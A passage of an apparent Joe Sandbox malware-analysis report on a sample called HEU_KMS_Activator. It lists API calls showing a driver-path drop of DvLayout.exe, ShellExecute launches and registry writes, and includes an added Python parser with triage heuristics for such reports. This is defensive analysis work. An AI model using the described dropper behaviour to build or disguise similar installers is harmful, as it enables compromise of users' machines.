      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    • GetDlgItem.USER32(?,000003FB), ref: 004042DC
    • GetAsyncKeyState.USER32(00000010), ref: 004042E3
    • GetDlgItem.USER32(?,000003F0), ref: 004042F3
    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404304
    • SetWindowTextA.USER32(?,?), ref: 00404333
    • SHBrowseForFolderA.SHELL32(?,0042A9D8,?), ref: 004043EA
    • lstrcmpiA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,004329D8), ref: 00404427
    • lstrcatA.KERNEL32(?,C:\Windows\SysNative\drivers\DvLayout.exe), ref: 00404433
      • Part of subcall function 00404170: lstrlenA.KERNEL32(004329D8,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,004329D8,?), ref: 00404207
      • Part of subcall function 00404170: wsprintfA.USER32 ref: 0040420F
      • Part of subcall function 00404170: SetDlgItemTextA.USER32(?,004329D8,000000DF), ref: 00404222
    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404443
    • CoTaskMemFree.OLE32(00000000), ref: 004043F5
      • Part of subcall function 004059DF: GetDlgItemTextA.USER32(00000001,00000001,00002000,00403E24), ref: 004059F2
      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D3C
      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D49
      • Part of subcall function 00405CE3: CharNextA.USER32(?,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D4E
      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D5E
      • Part of subcall function 00403D1A: lstrcatA.KERNEL32(00000000,00000000,00444380,00473000,install.log,00405803,00473000,00473000,00479000,004329D8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004329D8,00000000,00000006), ref: 00403D35
    • GetDiskFreeSpaceA.KERNEL32(004309D8,?,?,0000040F,?,004309D8,004309D8,?,00000000,004309D8,?,?,000003FB,?), ref: 004044FC
    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404517
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Item$CharText$Nextlstrcat$FreeWindow$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpilstrlenwsprintf
    • String ID: A$C:\Windows\SysNative\drivers\DvLayout.exe
    • API String ID: 856561098-543289465
    • Opcode ID: 9cb8a850940c117ae9918b06bedee8cee537e9a579c6043b719adc374c1cb9fe
    • Instruction ID: c836916bdd763984d0badc0942e4fb351485f7286358a5139267df7ee621e72d
    • Opcode Fuzzy Hash: 9cb8a850940c117ae9918b06bedee8cee537e9a579c6043b719adc374c1cb9fe
    • Instruction Fuzzy Hash: 05A163B1900219BBDB11AFA1CD85AAF7AB8EF84315F10403BF705B62D1DB7C99418B69
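The function records above are the place where an analyst would pull indicators out of this report: the record ending here is the one whose arguments carry the literal path C:\Windows\SysNative\drivers\DvLayout.exe, and earlier records show ShellExecuteA with the "open" verb and a CreateThread start routine. The following parser is an added example written for this page, not code from Joe Sandbox or from the sample; it turns "APIs" entries of the shape shown in these records into structured calls and applies a few triage heuristics. The line format it assumes ("• Api.DLL(args), ref: address", optionally prefixed with "Part of subcall function address:") and the triage rules are the example's own assumptions, and the sample lines are copied from the records above rather than taken from a live report.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: "APIs" entries copied from the function records in this
# report. The line shape assumed by the parser (an assumption about Joe Sandbox
# output, not something the report documents) is
#   "• Api.DLL(arg,arg,...), ref: <call-site address>"
# optionally prefixed with "Part of subcall function <address>:".
SAMPLE_LINES = r"""
• GetDlgItem.USER32(?,000003F0), ref: 004042AE
  • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
• lstrcmpiA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,004329D8), ref: 00404427
• ShellExecuteA.SHELL32(0000070B,open,00440380,00000000,00000000,00000001), ref: 004040AD
• CreateThread.KERNEL32(00000000,00000000,Function_00004DE2,00000000), ref: 00405051
• CreatePopupMenu.USER32 ref: 0040510B
• CreateDirectoryA.KERNELBASE(0047B000,00000000,0047B000,0047B000,0047B000,00000000,004038CD), ref: 0040372E
"""

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)"
    r"(?:\((?P<args>.*)\))?"          # the argument list is absent for no-arg calls
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass(frozen=True)
class ApiCall:
    api: str
    dll: str
    args: tuple
    ref: str                 # address of the call instruction
    subcall: Optional[str]   # helper the call was lifted from, if nested


def parse_api_lines(text):
    """Turn report lines into ApiCall records; lines that do not match are skipped.

    Arguments are split on commas, which is fine for the report's hex and "?"
    placeholders and for plain paths, but would mis-split a quoted string that
    itself contains a comma.
    """
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("dll"), args,
                             m.group("ref"), m.group("sub")))
    return calls


def windows_paths(calls):
    """Distinct drive-letter paths passed as literal arguments, in order seen."""
    seen = []
    for c in calls:
        for a in c.args:
            if WIN_PATH_RE.match(a) and a not in seen:
                seen.append(a)
    return seen


def calls_by_dll(calls):
    """Count calls per exporting module, a quick view of what the code touches."""
    counts = {}
    for c in calls:
        counts[c.dll] = counts.get(c.dll, 0) + 1
    return counts


def triage(calls):
    """Triage heuristics (this example's own assumptions, not report logic).

    Flags literal paths under a drivers directory, ShellExecute with the "open"
    verb, and CreateThread start routines: the patterns that line up with the
    report's "drops a device driver" signature.
    """
    findings = []
    for c in calls:
        for a in c.args:
            if WIN_PATH_RE.match(a) and "\\drivers\\" in a.lower():
                findings.append(f"{c.api}@{c.ref}: path under a drivers directory: {a}")
        if c.api.startswith("ShellExecute") and "open" in c.args:
            findings.append(f"{c.api}@{c.ref}: ShellExecute with verb 'open'")
        if c.api == "CreateThread" and len(c.args) > 2:
            findings.append(f"{c.api}@{c.ref}: thread start routine {c.args[2]}")
    return findings


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    print(calls_by_dll(parsed))
    for finding in triage(parsed):
        print(finding)
```

Run over the seven sample lines, the parser keeps the subcall address on the nested lstrcatA entry, records CreatePopupMenu with an empty argument tuple, and the triage pass reports the two DvLayout.exe path uses, the ShellExecuteA "open" call and the CreateThread start routine; the ref address on each finding is what you would carry into IDA against the snapshot file named in the record.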
    APIs
    • CoCreateInstance.OLE32(00408E9C,?,00000001,00408E8C,?), ref: 00402508
    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF), ref: 004025C0
    Strings
    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 004024EA
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ByteCharCreateInstanceMultiWide
    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
    • API String ID: 123533781-1377821865
    • Opcode ID: fb19eba547240b9af82341ebd456cded48a9d40c7292f28761688f9a22fbc9fd
    • Instruction ID: ace47b85452bd84cadd8e479b4ccfb42147929fec34fe95293edda35fc932576
    • Opcode Fuzzy Hash: fb19eba547240b9af82341ebd456cded48a9d40c7292f28761688f9a22fbc9fd
    • Instruction Fuzzy Hash: 6F513C74A00204BFCB009FA4CC89EAE7B79EF48324F20456AF915EB2D1C6799981CB94
    APIs
    • FindFirstFileA.KERNEL32(00000000,?), ref: 00402C4F
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FileFindFirst
    • String ID:
    • API String ID: 1974802433-0
    • Opcode ID: d439e7825e9b1bc448a1f46a6c08d315882172a76c1b5308fd852264ee1cf628
    • Instruction ID: 97b2fa22783d7095cd0330a120db18b4810eebad07d313fd0386075e021dfce7
    • Opcode Fuzzy Hash: d439e7825e9b1bc448a1f46a6c08d315882172a76c1b5308fd852264ee1cf628
    • Instruction Fuzzy Hash: 04E03071504204ABD711E7A9DD499AE7768EF01324F10017AF202E61D2D6789A81AA29
    APIs
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040523F
    • ShowWindow.USER32(?), ref: 0040525C
    • DestroyWindow.USER32 ref: 00405270
    • SetWindowLongA.USER32(?,00000000,00000000), ref: 0040528C
    • GetDlgItem.USER32(?,?), ref: 004052AD
    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004052C1
    • IsWindowEnabled.USER32(00000000), ref: 004052C8
    • GetDlgItem.USER32(?,00000001), ref: 00405377
    • GetDlgItem.USER32(?,00000002), ref: 00405381
    • SetClassLongA.USER32(?,000000F2,?), ref: 0040539B
    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004053EC
    • GetDlgItem.USER32(?,00000003), ref: 00405492
    • ShowWindow.USER32(00000000,?), ref: 004054B4
    • EnableWindow.USER32(?,?), ref: 004054C6
    • EnableWindow.USER32(?,?), ref: 004054E1
    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004054F7
    • EnableMenuItem.USER32(00000000), ref: 004054FE
    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00405516
    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00405529
    • lstrlenA.KERNEL32(004329D8,?,004329D8,004447E0), ref: 00405552
    • SetWindowTextA.USER32(?,004329D8), ref: 00405561
    • ShowWindow.USER32(?,0000000A), ref: 00405695
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
    • String ID:
    • API String ID: 184305955-0
    • Opcode ID: cafbaa89cf17bd47a15370d00d5a5914febd65cdafe1135a92eaa80fb9b1b955
    • Instruction ID: 44a91638ef903288846a9e909085ee46f5a352f35d98ba10fe6debb500bac352
    • Opcode Fuzzy Hash: cafbaa89cf17bd47a15370d00d5a5914febd65cdafe1135a92eaa80fb9b1b955
    • Instruction Fuzzy Hash: 2DC10575540A04AFDB206F21EE45E2B3BA8FB46349F41083EF541B11F1CB7A98929F1E
    APIs
    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F29
    • GetDlgItem.USER32(00000000,000003E8), ref: 00403F3D
    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F5B
    • GetSysColor.USER32(?), ref: 00403F6C
    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F7B
    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F8A
    • lstrlenA.KERNEL32(?), ref: 00403F94
    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FA2
    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FB1
    • GetDlgItem.USER32(?,0000040A), ref: 00404014
    • SendMessageA.USER32(00000000), ref: 00404017
    • GetDlgItem.USER32(?,000003E8), ref: 00404042
    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404082
    • LoadCursorA.USER32(00000000,00007F02), ref: 00404091
    • SetCursor.USER32(00000000), ref: 0040409A
    • ShellExecuteA.SHELL32(0000070B,open,00440380,00000000,00000000,00000001), ref: 004040AD
    • LoadCursorA.USER32(00000000,00007F00), ref: 004040BA
    • SetCursor.USER32(00000000), ref: 004040BD
    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004040E9
    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004040FD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$N$m>@$open
    • API String ID: 3615053054-1120229241
    • Opcode ID: c54931248dcf879a06aa9a813842b3089fb8890d335001570cbe3594db65afec
    • Instruction ID: 1975049c56b9601a5425fed2bd712eed394129e35b92e71f10f2f7ea666ba64f
    • Opcode Fuzzy Hash: c54931248dcf879a06aa9a813842b3089fb8890d335001570cbe3594db65afec
    • Instruction Fuzzy Hash: F061C5B1A40209BFEB109F20CD45F6A7BA8EB54711F10853AFB01BA1D1C7B8A9518F98
    APIs
    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
    • BeginPaint.USER32(?,?), ref: 00401047
    • GetClientRect.USER32(?,?), ref: 0040105B
    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
    • DeleteObject.GDI32(?), ref: 004010ED
    • CreateFontIndirectA.GDI32(?), ref: 00401105
    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
    • SelectObject.GDI32(00000000,?), ref: 00401140
    • DrawTextA.USER32(00000000,004447E0,000000FF,00000010,00000820), ref: 00401156
    • SelectObject.GDI32(00000000,00000000), ref: 00401160
    • DeleteObject.GDI32(?), ref: 00401165
    • EndPaint.USER32(?,?), ref: 0040116E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
    • String ID: F
    • API String ID: 941294808-1304234792
    • Opcode ID: 77880ef570d62a16d8cf7c5fa31c9eac7f0d2e5bbdf6e433d85d255717e4766c
    • Instruction ID: 7739937ae11a4a4f511c9698d3863d45820df5c4cc4c93504ff595c60b8501fc
    • Opcode Fuzzy Hash: 77880ef570d62a16d8cf7c5fa31c9eac7f0d2e5bbdf6e433d85d255717e4766c
    • Instruction Fuzzy Hash: 3C419D71800209AFCB058FA5DE459BFBFB9FF45315F00842EF591AA1A0CB389A54DFA4
    APIs
      • Part of subcall function 00405F56: GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
      • Part of subcall function 00405F56: LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
      • Part of subcall function 00405F56: GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000001,?,00000000,?,00000000,004066DB,?,00000000,000000F1,?), ref: 0040638F
    • GetShortPathNameA.KERNEL32(00000000,0043CA38,00000400), ref: 00406398
    • GetShortPathNameA.KERNEL32(?,0043D378,00000400), ref: 004063B5
    • wsprintfA.USER32 ref: 004063D3
    • GetFileSize.KERNEL32(00000000,00000000,0043D378,C0000000,00000004,0043D378,?,?,00000000,000000F1,?), ref: 0040640E
    • GlobalAlloc.KERNEL32(00000040,0000000A,?,00000000,000000F1,?), ref: 0040641D
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,000000F1,?), ref: 00406433
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0043CE38,00000000,-0000000A,00408D80,00000000,[Rename],?,00000000,000000F1,?), ref: 00406479
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,000000F1,?), ref: 0040648B
    • GlobalFree.KERNEL32(00000000), ref: 00406492
    • CloseHandle.KERNEL32(00000000,?,00000000,000000F1,?), ref: 00406499
      • Part of subcall function 00406096: lstrlenA.KERNEL32(0040644E,?,00000000,00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060A6
      • Part of subcall function 00406096: lstrlenA.KERNEL32(00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060D8
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
    • String ID: %s=%s$[Rename]
    • API String ID: 3772915668-1727408572
    • Opcode ID: e95eebb9e35e7837ed5ad6776b7e6e7baf5215a500b877816413feacdc889103
    • Instruction ID: 41a4a4035eb1337026f82450ada37153d99fb5e45317e0033bff3861c67150e4
    • Opcode Fuzzy Hash: e95eebb9e35e7837ed5ad6776b7e6e7baf5215a500b877816413feacdc889103
    • Instruction Fuzzy Hash: 0741F4312407057FE620AB659E89F6B3A5CDF45714F06403AFA46F22C1EA7CA81486BD
    APIs
    • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?), ref: 0040287C
    • lstrlenA.KERNEL32(0040E100,?,?,?,?,?,?), ref: 004028A0
    • RegSetValueExA.ADVAPI32(?,?,?,?,0040E100,00000000,?,?,?,?,?,?), ref: 00402957
    • RegCloseKey.ADVAPI32(?), ref: 0040297F
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 004028F7
    • WriteReg: error creating key "%s\%s", xrefs: 00402990
    • WriteReg: error writing into "%s\%s" "%s", xrefs: 0040296F
    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 004028B8
    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 0040293E
    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 004028CA
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrlen$CloseCreateValuewvsprintf
    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
    • API String ID: 1641139501-220328614
    • Opcode ID: 256a036e278ec10d2bd3bd9b526ede0a4da94bd0469c50779f37e7ffe2799d44
    • Instruction ID: 991f797a34c1ccbfca1b03fe384b4556dbf9fbbaa1ce29d1e89c021fabe5d232
    • Opcode Fuzzy Hash: 256a036e278ec10d2bd3bd9b526ede0a4da94bd0469c50779f37e7ffe2799d44
    • Instruction Fuzzy Hash: 28419072D00208BBDF116F95CD45EEFBBB9EF04718F10403AF505B61E0D67A4A90AB98
    APIs
    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CD5
    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402CF1
    • GlobalFree.KERNEL32(?), ref: 00402D2A
    • WriteFile.KERNEL32(?,00000000,?,FFFFFD66), ref: 00402D3C
    • GlobalFree.KERNEL32(00000000), ref: 00402D43
    • CloseHandle.KERNEL32(?), ref: 00402D5B
    • DeleteFileA.KERNEL32(?), ref: 00402D82
    Strings
    • created uninstaller: %d, "%s", xrefs: 00402D67
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
    • String ID: created uninstaller: %d, "%s"
    • API String ID: 3294113728-3145124454
    • Opcode ID: 8c4daffa764476c397bc4b19cee64eca0e30d7f61985a16ed9b83fed746a49d6
    • Instruction ID: 2a24e2d0c31af26bfff5c00de31e5aad972f2baae94c93b4e1f7cc7e2bb9d6f1
    • Opcode Fuzzy Hash: 8c4daffa764476c397bc4b19cee64eca0e30d7f61985a16ed9b83fed746a49d6
    • Instruction Fuzzy Hash: E431AC72800028BBDF116FA5CD85DAE7A79EF08324B14423EF520762E0DB7949419BA8
    APIs
    • GetWindowLongA.USER32(?,000000EB), ref: 00403C8A
    • GetSysColor.USER32(00000000), ref: 00403CA6
    • SetTextColor.GDI32(?,00000000), ref: 00403CB2
    • SetBkMode.GDI32(?,?), ref: 00403CBE
    • GetSysColor.USER32(?), ref: 00403CD1
    • SetBkColor.GDI32(?,?), ref: 00403CE1
    • DeleteObject.GDI32(?), ref: 00403CFB
    • CreateBrushIndirect.GDI32(?), ref: 00403D05
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
